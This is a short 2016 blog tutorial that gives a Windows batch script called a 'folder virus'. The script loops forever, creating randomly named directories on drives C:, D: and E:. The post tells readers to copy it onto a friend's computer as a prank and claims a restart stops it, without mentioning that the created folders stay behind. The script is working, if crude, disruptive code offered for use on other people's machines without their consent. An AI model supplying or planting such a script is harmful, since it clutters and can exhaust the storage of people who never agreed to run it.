Wednesday, 2 March 2016

How to create a folder virus using notepad

Steps to create a Folder Virus using Notepad:

1: Open Notepad: Open notepad from [Start >> Run >> Type “Notepad” and press Enter. Copy the below code in Notepad:
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in
2: Save the file: Now save the file as Virus.bat in your desktop. Just click Save as and save it as File name:  Virus.bat and File Type: All Files.
Create a Folder virus using notepad

You have successfully created a Folder virus using notepad. You can copy this trick in your friend’s computer and wait for his reaction. You can stop this virus by siimply restarting the system.

No comments:

Post a Comment